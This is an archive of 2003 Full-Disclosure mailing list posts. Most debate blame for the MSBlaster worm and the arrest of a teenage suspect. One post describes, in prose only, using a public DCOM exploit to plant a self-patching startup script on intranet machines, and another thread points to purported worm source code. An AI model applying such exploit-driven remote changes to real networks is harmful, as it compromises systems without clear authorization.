RE: [Full-Disclosure] Authorities eye MSBlaster suspect
I'd agree, but I'd need to add something to that... It's also the responsibility of 'the person or organization that connects to a hostile environment' to make some decent effort to reduce the level of hostility in that environment. Hostility is neither the enemy of nor an effective counter or deterrent to hostility.

> [mailto:[EMAIL PROTECTED] On Behalf Of morning_wood
> my stance is that as an entity on the internet, it is the responsibility of the person or organization that connects to a hostile environment to ensure themselves a reasonable amount of protection.

[huge great snip in the interests of non-top-posting]

___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
In my opinion, this is just a sad attempt to deflect responsibility away from Microsoft Corporation. Yeah, the kid is quite foolish for making himself such an easy scapegoat... but I'm sure the prosecutors will push for more punishment than he deserves, since the ORIGINAL virus writer(s) have not been named.

Now, every asshole in America will be talking about this kid at work, dinner parties, vacation, etc. I can just see it now...

- "Did you hear about the kid in Minnesota that wrote that virus? Remember... you couldn't turn on your computer because it kept rebooting?"
- "Oh yeah... I had to pay $50 to get that fixed at Joe's computer shop... they caught the guy?"
- "Yeah... he's in big trouble"

The problem is that governments and corporations own the media and this story is not going to be represented in a fair way to John Q. Public. I feel very sorry for the kid... he's only in high school and now he'll probably have a criminal record (federal).

Kris Hermansen
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Friday, August 29, 2003 3:47 PM -0500 Jerry Heidtke [EMAIL PROTECTED] wrote:

> It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there.

Wow! I'm glad you're not in charge of the Justice Department. I would *hope* you need a little more proof than that. Everything you've listed is purely circumstantial. Wouldn't you at least like to have an IP linking him to the seeding of the worm? Or is the mere presence of his handle enough to throw his ass in jail?

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Friday, August 29, 2003 3:43 PM -0700 Anthony Saffer [EMAIL PROTECTED] wrote:

> Sorry for just jumping in here but I couldn't resist. Certainly, you have to admit that there is such a thing as shared responsibility and contributory negligence. Even the law recognizes these things. Sure, it's the coder's fault for creating and releasing the worm, but the administrators do bear SOME responsibility for not being proactive and patching their systems. There have been cases of patches being available for 6 months to a year and a worm coming along and cleaning house. How can anyone say that the admin isn't partially responsible?

Absolutely the admins are at least partly responsible for the damage caused to their own systems (and I would argue the greater the time since a patch was released, the more responsibility they bear) and for damage they cause to other systems. But for the worm itself? Absolutely not.

> Sure, in a perfect world, we wouldn't have to worry about patching our systems and all would be well. But we don't live in a perfect world and every computer admin should know how to patch his system. If he/she doesn't then they shouldn't have their job. There is, after all, such a thing as preventative action.

In a perfect world, admins would get to implement the practices they know to be best for their organization. We don't live in a perfect world. Oftentimes admins' hands are tied by the decision makers who control the purse strings.

We still have infected hosts in the student apartments. Would you blame the admins for that? By law they are not allowed to support the students' personal computers. The best they can do is deny them network access until they're fixed. So the damage is limited to our network and doesn't go out to the world. Yet you would have them fired for incompetence. The admins know exactly what to do to protect a system. In this case they aren't allowed to do it.

Yet, if the worm writer hadn't released the worm, the problem wouldn't even exist, would it?

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
[Full-Disclosure] How to massively remove DCOM RPC Worms
Hi Gentlemen,

Following the article http://www.securityfocus.com/archive/119/333927, I applied this principle on our IntraNet. I used the oc192-dcom proof of concept code from securityfocus too.

I created a ms.bat script placed into the startup group (c:\documents and setting\all users\...\startup). This script downloads via TFTP:
- stinger, to remove active worms (else there are issues patching)
- MS03-026 for the associated OS (Win2K or XP)

On an XP machine the reboot is automatic when you kill the exploit (I have not yet searched for how to reboot on Win2K).

Result: after the reboot, the ms.bat script is launched, it cleans the box and installs the patch. Then it deletes itself and associated files. Again, on XP, installing the patch makes XP reboot automatically. The only problem is that the patch requires user action to approve. Maybe there is a more silent version.

This trick has been included into a scanning program running on FreeBSD 4.8, and so this simple trick permits patching hundreds of machines.

Might be useful to others.

Brgrds

Laurent LEVIER
IT Systems Networks Security Expert
Re: [Full-Disclosure] Fw: Computers crashed just before blackout
(notes below...)

- Original Message -
From: Richard M. Smith [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; 'Michael Scheidell' [EMAIL PROTECTED]; 'Alan Kloster' [EMAIL PROTECTED]; 'Geoff Shively' [EMAIL PROTECTED]; 'Drew Copley' [EMAIL PROTECTED]
Sent: Friday, August 29, 2003 6:35 AM
Subject: Computers crashed just before blackout

> http://www.cleveland.com/news/plaindealer/index.ssf?/base/news/106207424774610.xml
>
> Computers crashed just before blackout
> 08/28/03
> John Funk, Teresa Dixon Murray and Tom Breckenridge
> Plain Dealer Reporters
>
> FirstEnergy Corp. could not see mounting transmission line problems in the crucial hour before the Aug. 14 blackout because its key computers were down, according to at least two municipal electric systems. Whether the computer troubles were the result of hardware or software problems was not known yesterday. Investigators from the Department of Energy have visited the utility's Akron control center, said spokesman Ralph DiNicola. FirstEnergy is detailing how the control center computers operated that day for the DOE, said DiNicola. He repeatedly declined to say whether there were any computer problems.
> ...

Yep, looks like the HMI systems (that allow the humans to see warnings and critical situations, and to manually reroute power) went down. Bet you 30,000 quatros that those HMI systems communicated to the SCADA systems via DCOM.

Time for our lobbyists in DC to get to work, making sure all critical infrastructure systems, utilities, water, power, traffic, AIR CONTROL update their best practices. Also time for HMI/SCADA/FA vendors to update their clients, and make sure that this won't happen again.

Looks like the clients/end users will need to firewall their SCADA/FA systems and forget the Microsoft 'COTS' (commercial off the shelf) office/factory integration promise.

--
Michael Scheidell, CEO
SECNAP Network Security, LLC
Sales: 866-SECNAPNET / (1-866-732-6276)
Main: 561-368-9561 / www.secnap.net
Looking for a career in Internet security?
http://www.secnap.net/employment/
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
The FBI followed the same steps that you outlined to locate Jeffrey Parson, according to his indictment papers. The FBI also got an IP address for Jeffrey which traced back to his house from the hosting service for t33kid.com.

Moral of the story: If you want to be a successful cybercriminal, remember to always hide behind proxy servers and don't use your real name and address when registering a domain name.

If found guilty, I think an appropriate sentence is to make him clean up virus infected computers in public schools for a year.

Richard

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jerry Heidtke
Sent: Friday, August 29, 2003 4:47 PM
To: the lumpalaya
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect

> It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there.
>
> Jerry
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
> So you would blame ... Nice set of ethics there.

> you believed that admins were at fault for worm infections.

> ...it is each admin's responsibility ... not the coder.

> a crime victim is affected by the crime ...

Before we can make progress in a discussion of blame we have to get the analogy right. A biological virus is comprised of the same programming instructions we possess, and execute, as organisms: nucleic acids.

HIV exists. Suppose it were engineered on purpose. It makes logical sense to blame every infection, all effects, every death, on the genetic engineer. Perpetually. Despite proof that shows that the virus is evolving in the wild without further engineering help. Because said virus would not exist, and thus no variants would exist, if not for the engineering effort of the original programmer.

Suppose another engineer tinkers with the genetic code of the original HIV and makes something different, better, or just tries to inoculate everyone by turning it into a 'good' virus. The original programmer/engineer would logically continue to bear part of the blame.

Bad computer code isn't much different from bad nucleic acids. When a person is responsible for creating the instructions, shouldn't that person be blamed for everything that those instructions, and works derived from those instructions, do that is either 'good' or 'bad'? Logically, yes.

In practice, in a context of full disclosure where known 'safe' behaviors, practices, technology, and essential defense mechanisms must be deployed by anyone who chooses to engage in risky behavior because the threat is well understood and is no longer secret, the answer must be no. It is the person who delivers the bad instructions who must be found to be at fault, not the person who created the bad instructions. Legally, this distinction is recognized by some but not all computer crime legislation.

There is almost a balance presently, and prosecutors are nearly empowered with the flexibility to decide in which direction to tip that balance on a case-by-case basis. Which way we let the laws tip for future prosecutions is a very important social choice that we're all in the process of making.

We could argue that the hypothetical author of HIV is to blame for AIDS infections and deaths even if she never infected anyone, simply because she left the virus lying around in proximity to humans who she should have known would end up infected with it. We could argue that by not making it an airborne virus she intentionally added a safety precaution, and without this precaution the original infection(s) caused by proximity to the virus constitute her 'delivery' of the virus to those who were infected. There are many ways to look at the issue, and after considering all available evidence and weighing the applicable ethics and the principles of law, logic, and reason we're all still going to disagree...

But to engage in such a discussion, and it is an important one, the notion that crime has occurred simply because there are victims must be challenged. We cannot automatically apply the standards of blame that we use for rape and murder to the harm that is done to people whose computer systems are affected by malicious code.

I personally delivered zero MS Blaster.* infections to others, intentionally or unintentionally. On the other hand, I have personally delivered cold and flu infections to others and perhaps some bacterial infections as well, despite the fact that I knew that I was sick. I've personally continued to work, attend school, or live in close proximity to somebody who was infectious, knowing that in doing so I was likely to become a replication vector for the infectious disease and spread the infection to others.

Before I was aware of the risk, and my responsibility to protect others by protecting myself, before I knew that there were steps I must take to contain the spread of infectious illness, I posed a severe and unwarranted threat to others. By spreading my cold, flu, or bacterial infections to others 'unintentionally' yet as a direct result of negligence or ignorance, I was in fact to blame for the harm that I caused directly to others.

Was I to blame for the harm that others subsequently caused to others through additional rounds of infection? I don't know. *Should* I be blamed? Maybe. If there was malicious intent, if the spread of the infection was purposeful, then yes. By virtue of my possession and dissemination of the harmful nucleic acids or bacteria if I've taken appropriate precautions to limit the risk they pose to others? No.

Do we blame the hypothetical author of the HIV genetic code for the outbreak of AIDS? If not, by virtue of the lack of effort to spread/deliver/infect, then we can't blame the author of MS Blaster.* for its outbreak. Otherwise, we must make it clear as a matter of law that engaging in research and development that results in harmful organisms, substances, or instructions is, in and of itself, a crime --
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
On Fri, 29 Aug 2003 12:22:19 PDT, morning_wood [EMAIL PROTECTED] said:

> get educated, take some responsibility for your high paying job, and quit trying to lay the blame elsewhere.

On Fri, 29 Aug 2003 13:04:19 PDT, morning_wood [EMAIL PROTECTED] said:

> i think you mixed the top portion of my post with the poor me examples on the bottom, i blame the person that commits the act

Well... if it's the fault of the person committing the act, why are you complaining about the first poster putting the blame elsewhere? Yes, he *COULD* be doing all this work up-front - the point is that whether he does it before or after, he's still having to do stuff to protect HIS network from others. And has it occurred to you that *MAYBE* his high paying job would be more productive if he wasn't spending most of his time having to deal with people breaking in, either proactively or reactively??
[Full-Disclosure] Authorities eye MSBlaster suspect (long reply)
On Friday, August 29, 2003 12:22 PM, morning_wood [mailto:[EMAIL PROTECTED] wrote:

> shouldnt these measures been in place already? instead of rushing on a per-incident basis, you should be implementing these things anyway.

IMHO it is prudent to expend some overkill during lockdown and penetration testing on a system when it is deployed or periodically tested, so there is a reduction during a per-incident basis.

IMHO, security is as heterogenic as the types of people or entities connected to the Internet. Your suggestion befits a single deployment or a range of entities. But when adding the complexity of multiple locations, heterogeneous systems, multiple ownership, and an open environment, security is more complex than written policy, training, automated tools, lockdowns, or penetration testing. In short, yeah, what you suggest is true, but now let's talk about a part of the real world that is examined infrequently.

Private (and non-profit) enterprises can operate under a different set of rules than an educational institution. By nature, a university network is an open resource. Although segments of that network are cordoned off (and I live in part of that cordoned segment), the vast majority are interconnected. Additionally, faculty, staff, students, alumni, and even the public, can use our resources. Research and sharing is a high priority.

As to the latest exploit, measures were already in place. On the medical side, HIPAA already covers making best efforts to protect patient privacy. For example, if a machine in the medical center is compromised, it is removed immediately from the network as soon as the compromise is discovered. For the remainder of the university campus, if any machine compromises the network (as in virus/worm source), its network port is disabled until the machine is repaired. But all it takes is one machine and you have generated the incident which requires the response.

Now consider the task of maintaining patches on 20,000 hosts (5,000 in health sciences; 15K through the rest of the Seattle campus). For those systems running Windows, the versions range from Windows 95 to Win2K+3. At best, patching is an Aegean effort. To complicate matters, the central computing group for the university owns only a modest fraction of this number. More than 4/5 are owned by the various autonomous schools and departments in the university, each responsible for their own patching and maintenance. Nor are funds available to replace all old machines or operating systems, so a proclamation cannot be issued that the old (and normally less secure) systems shall vanish.

And just what can be locked down? Systems, both workstations and servers, in the medical center have a strong best-practices policy. They live in a moderately-secured area of the network. But what about anything else that can touch them? The systems of doctors, students, and staff at home? How about a visiting doctor's, professor's, or even a salesman's machine? Computers in labs where a professor and a few assistants labor on problems. Students' notebooks? Each has been a live infection point. And I can overwhelm this list with other actual examples that defy a homogenous security policy.

Recall that security balances against usability and resources. While portions of the network can be secure, an entire educational network cannot be secured without the size of expenditure typically the domain of private corporations. That size of expenditure is well beyond the desire demonstrated by state legislatures nationwide (and parallel government bodies worldwide). Nor can the network be secured to an exceptionally low incident-level without depriving your employees (faculty, staff) and customers (students and the public) of those resources.

And upon that subject of resources, like many other publicly-funded entities our budget has been reduced. We are doing more with less money. No complaint; businesses do it during downturns. So shall we. But my group's job enables investigators to conduct research that results in improving medical treatment. Did I mention that every dollar spent comes from your pocket? So, may I ask, is it more desirable to spend your money on improving response to human disease or improving response to electronic distress? It's strictly an allocation of finite resources; that dollar gets spent on one thing or the other. Which do you choose?

> get educated, take some responsibility for your high paying job, and quit trying to lay the blame elsewhere.

I take your statement rhetorically since zero research was conducted on my bona fides. Nor will I breach netiquette in responding on a personal basis. I will claim my education is expansive, I do take responsibility, and my compensation is considered moderate in the academic world. And the blame is laid where the blame is due. No one can present successfully to me the argument that these incidents favor us (the corporation/institution/public/whatever) by forcing
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
> The problem is that governments and corporations own the media and this story is not going to be represented in a fair way to John Q. Public. I feel very sorry for the kid...he's only in high school and now he'll probably have a criminal record (federal).

Why feel sorry for him? While it's true that the blame for the problem lies mainly with Microsoft and unpatched systems, this kid is an adult and he knew what he was doing was illegal. He also knew the potential consequences. At some point he made the conscious decision to disregard the law and, thereby, accept any consequences his actions might incur. Nobody forced him to do it. It was his choice.

Anthony Saffer
SCS Consulting Services
www.safferconsulting.com
RE: [Full-Disclosure] MsBlaster Source?
That's the source to Nachia/Welchia.

-Original Message-
From: Shanphen Dawa [mailto:[EMAIL PROTECTED]
Sent: Friday, August 29, 2003 5:01 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] MsBlaster Source?

> Can anyone, who is obviously better at coding than I, verify the rumours that the following link is the source to msblaster?
>
> https://www.xfocus.net/bbs/index.php?act=STf=1t=26924

Confidentiality Notice: This e-mail message, including any attachments, is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message.
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
On Fri, 29 Aug 2003 14:46:32 PDT, morning_wood said:

> > And has it occurred to you that *MAYBE* his high paying job would be more productive if he wasn't spending most of his time having to deal with people breaking in, either proactively or reactively??
>
> that is his job

You're totally missing the point. If I'm doing security 30 hours a week, that's 30 hours a week I'm not available for other things.

That's 30 hours I'm not spending helping do network performance tuning for the mail server. I'm sure the 70,000 users of the mail server would prefer that I was able to do that instead.

That's 30 hours I'm not spending designing a new, more featureful print management system. I'm sure the people who get print jobs that we need to keep running (accounts receivable, invoices, purchase orders, etc) would prefer I was able to do that instead.

That's 30 hours I'm not spending diagnosing compiler and kernel bugs. I'm sure the researcher who has a $2M grant project dead in the water would prefer I was able to do that instead.

That's 30 hours I'm not spending working on a way to migrate users from Windows to Linux. I'm sure the people who are looking at a $500K/year bill for Microsoft licenses (and want a way to save money) would prefer I was able to do that instead.

That's 30 hours I'm not spending deploying a new release of Listserv that has features that my users are asking for. I'm sure that many of the users on our 6,023 lists would prefer I was able to do that instead.

You starting to see a pattern here? And yes, those are *ALL* things that are *part of* my job. Many of them are things I'd enjoy doing more. All of them are things that would provide more *direct* benefit to my site than doing security.

And you can't weasel out by saying "Hire somebody else to do that other stuff" or "hire somebody else to do security" - the point is that if we did hire somebody else, then we'd only have 1 person of the 2 available for productive work. If we didn't have to keep spending resources on security, BOTH people would be available then.
Re: [Full-Disclosure] RIP: ActiveX controls in Internet Explorer?
Richard M. Smith [EMAIL PROTECTED] wrote: As everyone knows, ActiveX controls and the OBJECT tag has been a big source of security holes in Internet Explorer. ... And serious exposures in other browsers too. Remember, the folk writing most of these fancy plug-in doo-dad thingamies are largely clueless about Internet security and the ramifications of accepting arbitrary data, particularly if it is not produced by their own software at the other end of the pipe. In fact, I'd not be surprised if, on average, they are much worse than MS but have managed to evade the spotlight due to the preponderance of attention several hundred million more potential targets buys MS... For just one chronically bad, equal-to-anything-ever-in-IE, example just look at the very recently disclosed RealOne Player, et al. bug (sorry, URL will wrap): http://www.digitalpranksters.com/advisories/realnetworks/smilscriptproto col.html ... However, it looks like support for ActiveX controls is going to be removed from Internet Explorer. A small company called Eolas recently won a $521 million judgment against Microsoft for patent infringement. The Eolas patent covers plugins in Web pages to show multimedia content. Yes -- kinda nice result (and there I was thinking software patents were necessarily all bad... 8-) ). The $521 million payment covers past infringement. Because Bill Gates loathes to pay per-copy royalties, ... How ironic. 
Given that a large chunk of his personal fortune is due to the unethical and illegal Windows taxcollected by his company for all those years (and still effectively being paid by many choosing not to run his company's OSes), and given his company's (legal department's) repeated statements about how much the company respects IP and depends on protecting its own IP, and given the clearly gross profiteering the company has engaged in to accumulate at least $49 billion cash reserves (sorry -- $48.479 billion now), you'd think shelling out a few cents per copy of Windows to show your respect for someone else's IP used liberally in a critical component of your OS (another irony -- the DoJ defense comes full circle to bite Bill's arse to the tune of $521 million) would be small beer... ... it looks like Microsoft is going to either partially or completely remove support for ActiveX controls in Internet Explorer rather than pay Eolas any more money. Cool. Pity though that that other recent court ruling threatening to require MS to ship a true Java client didn't stick -- had it, MS would have had an easy solution _and_ an easy out for the total about-face of such a move. Combined these two rulings could have saved its sorry arse basically for free, aside from the loss of face... snip patent talk The W3C has set up a discussion list to talk about replacements for ActiveX in Internet Explorer: http://www.w3.org/2003/08/patent Fortunately the corruption of W3C's role apparent in your chosen wording (making W3C the driver of standards to cement IE as _the_ web browser) is not actually reflected in the content of that page! 8-) It seems they really are concerned that this patent will upset the whole applecart (or at least, a substantial chunk of the applecart developer market -- I doubt the folk behind Lynx are too concerned). 
That said however, several of the heavy-hitters in W3C potentially have a lot to lose if this patent has teeth and is applied to other browsers too -- dream of a web without SWF and all those other, lesser third-party abominations that so seriously detract from the original concept... Then consider the W3C's stated goals: http://www.w3.org/Consortium/#goals and in particular: 1. Universal Access: To make the Web accessible to all by promoting technologies that take into account the vast differences in culture, languages, education, ability, material resources, access devices, and physical limitations of users on all continents; I hope that security people also join this list. This redesign of the Internet Explorer browser looks like the perfect time to put pressure on Microsoft to put in place a proper security system for browser add-ins. Indeed. Unfortunately, the page linked above is rather telling -- it does not mention the words secure, securely or security once. Given this lofty ideal from: http://www.w3.org/Consortium/#mission ... To meet the growing expectations of users and the increasing power of machines, W3C is already laying the foundations for the next generation of the Web. W3C's technologies will help make the Web a robust, scalable, and adaptive infrastructure for a world of information. I'd say it's about time the W3C addressed security issues head-on. Of course, how willing and able a standards body stacked with the commercial interests of its industry sector might be to completely revamping and correcting its previous errors is a good question...
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
So you would blame ... Nice set of ethics there. you believed that admins were at fault for worm infections. ...it is each admin's responsibility ... not the coder. a crime victim is affected by the crime ... Before we can make progress in a discussion of blame we have to get the analogy right. A biological virus is comprised of the same programming instructions we possess, and execute, as organisms: nucleic acids. HIV exists. Suppose it were engineered on purpose. It makes logical sense to blame every infection, all effects, every death, on the genetic engineer. Perpetually. Despite proof that shows that the virus is evolving in the wild without further engineering help. Because said virus would not exist, and thus no variants would exist, if not for the engineering effort of the original programmer. Suppose another engineer tinkers with the genetic code of the original HIV and makes something different, better, or just tries to inoculate everyone by turning it into a 'good' virus. The original programmer/engineer would logically continue to bear part of the blame. Bad computer code isn't much different from bad nucleic acids. When a person is responsible for creating the instructions, shouldn't that person be blamed for everything that those instructions, and works derived from those instructions, do that is either 'good' or 'bad'? Logically, yes. In practice, in a context of full disclosure where known 'safe' behaviors, practices, technology, and essential defense mechanisms must be deployed by anyone who chooses to engage in risky behavior because the threat is well understood and is no longer secret, the answer must be no. It is the person who delivers the bad instructions who must be found to be at fault, not the person who created the bad instructions. Legally, this distinction is recognized by some but not all computer crime legislation. 
There is almost a balance presently, and prosecutors are nearly empowered with the flexibility to decide in which direction to tip that balance on a case-by-case basis. Which way we let the laws tip for future prosecutions is a very important social choice that we're all in the process of making. We could argue that the hypothetical author of HIV is to blame for AIDS infections and deaths even if she never infected anyone simply because she left the virus lying around in proximity to humans who she should have known would end up infected with it. We could argue that by not making it an airborne virus she intentionally added a safety precaution, and without this precaution the original infection(s) caused by proximity to the virus constitute her 'delivery' of the virus to those who were infected. There are many ways to look at the issue, and after considering all available evidence and weighing the applicable ethics and the principles of law, logic, and reason we're all still going to disagree... But to engage in such a discussion, and it is an important one, the notion that crime has occurred simply because there are victims must be challenged. We cannot automatically apply the standards of blame that we use for rape and murder to the harm that is done to people whose computer systems are affected by malicious code. I personally delivered zero MS Blaster.* infections to others, intentionally or unintentionally. On the other hand, I have personally delivered cold and flu infections to others and perhaps some bacterial infections as well, despite the fact that I knew that I was sick. I've personally continued to work, attend school, or live in close proximity to somebody who was infectious, knowing that in doing so I was likely to become a replication vector for the infectious disease and spread the infection to others. 
Before I was aware of the risk, and my responsibility to protect others by protecting myself, before I knew that there were steps I must take to contain the spread of infectious illness, I posed a severe and unwarranted threat to others. By spreading my cold, flu, or bacterial infections to others 'unintentionally' yet as a direct result of negligence or ignorance I was in fact to blame for the harm that I caused directly to others. Was I to blame for the harm that others subsequently caused to others through additional rounds of infection? I don't know. *Should* I be blamed? Maybe. If there was malicious intent, if the spread of the infection was purposeful, then yes. By virtue of my possession and dissemination of the harmful nucleic acids or bacteria if I've taken appropriate precautions to limit the risk they pose to others? No. Do we blame the hypothetical author of the HIV genetic code for the outbreak of AIDS? If not, by virtue of the lack of effort to spread/deliver/infect, then we can't blame the author of MS Blaster.* for its outbreak. Otherwise, we must make it clear as a matter of law that engaging in research and development that results in harmful organisms, substances, or instructions is, in and of itself, a crime --
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
I didn't say anything about throwing his ass in jail, did I? Since when did getting a warrant = incarceration? The evidence cited would be enough to at least cause him to be talked to, don't you think, even in an environment where there was some respect for civil rights and the presumption of innocence still existed. In the US's political climate these days, people have been disappeared for months on evidence more circumstantial than that. I don't like it or agree with it. Take it up with Herr Ashcroft. -Original Message- From: Paul Schmehl [mailto:[EMAIL PROTECTED] Sent: Friday, August 29, 2003 5:15 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect --On Friday, August 29, 2003 3:47 PM -0500 Jerry Heidtke [EMAIL PROTECTED] wrote: It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there. Wow! I'm glad you're not in charge of the Justice Department. I would *hope* you need a little more proof than that. Everything you've listed is purely circumstantial. Wouldn't you at least like to have an IP linking him to the seeding of the worm? Or is the mere presence of his handle enough to throw his ass in jail? Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MsBlaster Source?
if ( !MyStartService(szServiceTftpd) ){ does appear so. Seems like there is more code that's not here. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jerry Heidtke Sent: Friday, August 29, 2003 6:59 PM To: Shanphen Dawa; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] MsBlaster Source? That's the source to Nachia/Welchia. -Original Message- From: Shanphen Dawa [mailto:[EMAIL PROTECTED] Sent: Friday, August 29, 2003 5:01 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MsBlaster Source? Can anyone, who is obviously better at coding than I, verify the rumours that the following link is the source to msblaster? https://www.xfocus.net/bbs/index.php?act=ST&f=1&t=26924 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
He'll more likely go to prison for 10-20. That's if he's lucky. I'm certain he will be made an example of. Poor dumb bastard. He wanted attention, now he's got it. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Richard M. Smith Sent: Friday, August 29, 2003 6:36 PM To: 'Jerry Heidtke'; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect The FBI followed the same steps that you outlined to locate Jeffrey Parson according to his indictment papers. The FBI also got an IP address for Jeffrey which traced back to his house from the hosting service for t33kid.com. Moral of the story: If you want to be a successful cybercriminal, remember to always hide behind proxy servers and don't use your real name and address when registering a domain name. If found guilty, I think an appropriate sentence is to make him clean up virus infected computers in public schools for a year. Richard -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jerry Heidtke Sent: Friday, August 29, 2003 4:47 PM To: the lumpalaya Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there. Jerry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
--On Friday, August 29, 2003 1:14 PM -1000 Jason Coombs [EMAIL PROTECTED] wrote: Before we can make progress in a discussion of blame we have to get the analogy right. So, are you responsible for all five copies of this message? :-) Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
Paul Schmehl [EMAIL PROTECTED] [2003:08:29:17:12:06-0500] scribed: snip / Yet, if the worm writer hadn't released the worm, the problem wouldn't even exist, would it? And, if guns had not been invented, nobody could be shot to death. So, what is it that you are trying to say? Who can put the jinni back into the bottle? -- Best Regards, mds - Dare to fix things before they break . . . - Our capacity for understanding is inversely proportional to how much we think we know. The more I know, the more I know I don't know . . . --
RE: [Full-Disclosure] JAP back doored
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Goncalo Costa Sent: Thursday, August 28, 2003 2:47 AM To: Drew Copley Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] JAP back doored snip Your arguments have nothing to do with the argument at hand which is quite simple: Governments should have no right to force developers to trojanize their applications and keep silent about it. Apparently, this entire email is from someone that wants to argue over the definition of the word government here. They take offense at me saying the German Government did this, though they have no problem saying, The US government did that. Regardless, I stand by my statement, above, which is exceedingly simple. (And, this statement does not even mention German, nor US.) snip I think you should stop for a minute and try to learn the difference between Germany (country), the German state, the German government and the German judicial system. Germany did nothing. Case in point. If you want to talk about the German government you could talk about http://www.gnupg.org/aegypten Cool. Just like what the US does. Lotsa of programs like that. Case in point. snip... A lot of other cases in point Costa, I do not condemn people that use the word government vaguely. There is no reason to. You do condemn people that do this. Yet, you do this yourself. Why be a hypocrite over a rule which is so meaningless that you had to make it up? That is a rhetorical question. I do not need your answer. Your replies were ludicrous and hypocritical. Even if I bothered defending myself, I would be defending mostly things I did not say. If you want to foam at the mouth on these issues I would suggest alt.hate.USA or something, rather than here. And, yeah, under an assumed name, I have released an anonymizing agent, and that was why I posted on this issue. I did not do it because of anti-German prejudice. 
In fact, my same group has also released an application by a German developer. My concern, though it may have sounded nationalistic, was not. But, I have already said this, and will not again. Any further emails will be plonked. Maybe you can post on something regarding security. -BEGIN PGP SIGNATURE- Version: PGP 8.0 iQA/AwUBP0+f9gkWkugjEnC3EQIxyQCgxnLzsrZOenPwNxB3BlFiwQcsQ9kAn2Eb 2XJxttrY+78rtlDboge0HvzI =MLV0 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect (longreply)
--On Friday, August 29, 2003 15:49:43 -0700 Chris DeVoney [EMAIL PROTECTED] cast his pearls before swine and wrote: In short, yeah, what you suggest is true but now let's talk about a part of the real world that is examined infrequently. Well stated, but an absolute waste of time on this list. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Authorities eye MSBlaster suspect
